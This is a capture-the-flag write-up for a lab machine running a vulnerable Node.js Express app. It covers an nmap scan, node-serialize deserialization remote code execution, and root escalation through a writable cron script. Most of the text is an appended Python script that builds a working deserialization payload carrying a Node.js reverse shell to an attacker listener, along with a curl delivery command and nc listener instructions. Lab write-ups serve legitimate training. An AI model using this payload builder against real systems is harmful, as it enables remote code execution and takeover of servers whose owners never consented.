The machine runs a Node.js Express application on port 3000 that is vulnerable to insecure deserialization (the node-serialize bug described in the linked opsecx post), which gives remote code execution. Privilege escalation was done by abusing a cron job that root runs from a user-writable script.
```
# Nmap 7.70 scan initiated Wed Jun 6 12:56:14 2018 as: nmap -p- -T4 -sV -oN celestial-full-scan.nmap -v 10.10.10.85
Warning: 10.10.10.85 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.85
Host is up (0.13s latency).
Not shown: 65471 closed ports, 63 filtered ports
PORT     STATE SERVICE VERSION
3000/tcp open  http    Node.js Express framework
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun 6 13:16:46 2018 -- 1 IP address (1 host up) scanned in 1231.62 seconds
```
- NodeJS Express Exploit: https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
- Script to encode reverse-shell: https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py
- Base64-encode the reverse-shell payload (the serialized object containing it) and send it to the application
- Start an nc listener and catch the reverse shell
- Find the user flag
- The home directory contains a file "output.txt" that is owned by root and is rewritten every few minutes. This looks like the output of a cron job
- Check the Documents directory
- The script there just prints "Script is running", which is exactly the content of output.txt, so this script must be what root's cron job runs. Since it is writable by our user, edit it and replace its contents with a reverse shell
- Start nc listening on port 1234 and wait for the next cron run
- Get the root flag
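As an added example of the foothold steps above (not code from the writeup, and not the linked nodejsshell.py), the script below builds the node-serialize payload: it encodes a Node.js reverse shell as `eval(String.fromCharCode(...))` so the JavaScript carries no quotes that would break the surrounding JSON, wraps it in the `_$$ND_FUNC$$_function (){...}()` IIFE that `unserialize()` evaluates, checks the result is still valid JSON, and base64-encodes it. The listener address, port and the `profile` cookie name are assumptions for illustration.

```python
import base64
import json

# Attacker listener; constructed values for this example, not from the writeup.
LHOST = "10.10.14.2"
LPORT = 4444


def node_reverse_shell(lhost: str, lport: int) -> str:
    """Node.js reverse shell: spawn /bin/sh and pipe it over a TCP socket."""
    return (
        "var net=require('net'),cp=require('child_process'),"
        "sh=cp.spawn('/bin/sh',[]);var c=new net.Socket();"
        f"c.connect({lport},'{lhost}',function(){{"
        "c.pipe(sh.stdin);sh.stdout.pipe(c);sh.stderr.pipe(c);});"
    )


def to_fromcharcode(js: str) -> str:
    """Rewrite JS as eval(String.fromCharCode(...)) so it contains no quotes or
    backslashes that would break the JSON string it is embedded in (the same
    trick nodejsshell.py uses)."""
    codes = ",".join(str(ord(ch)) for ch in js)
    return f"eval(String.fromCharCode({codes}))"


def build_payload(js: str) -> str:
    """Serialized object in the form node-serialize expects. The _$$ND_FUNC$$_
    prefix makes unserialize() eval the rest as a function; the trailing ()
    turns it into an IIFE so it runs during deserialization itself."""
    return '{"rce":"_$$ND_FUNC$$_function (){' + js + '}()"}'


def build_cookie(js: str) -> str:
    """Base64 cookie value, after checking the payload is still valid JSON."""
    payload = build_payload(js)
    json.loads(payload)  # raises ValueError if the JS broke the JSON (stray quotes etc.)
    return base64.b64encode(payload.encode()).decode()


def decode_cookie(cookie: str) -> dict:
    """Inverse of build_cookie; handy for inspecting a captured cookie."""
    return json.loads(base64.b64decode(cookie))


if __name__ == "__main__":
    shell = to_fromcharcode(node_reverse_shell(LHOST, LPORT))
    cookie = build_cookie(shell)
    # The cookie name is an assumption; use whichever cookie the target sets.
    print(f"curl -s http://10.10.10.85:3000/ --cookie 'profile={cookie}'")
```

Run it with `nc -lvnp 4444` already listening; the printed curl command delivers the cookie, and the shell arrives when the server deserializes it. The `json.loads` check is worth keeping: a payload that is not valid JSON never reaches `eval`, which is the usual reason a hand-built cookie silently does nothing.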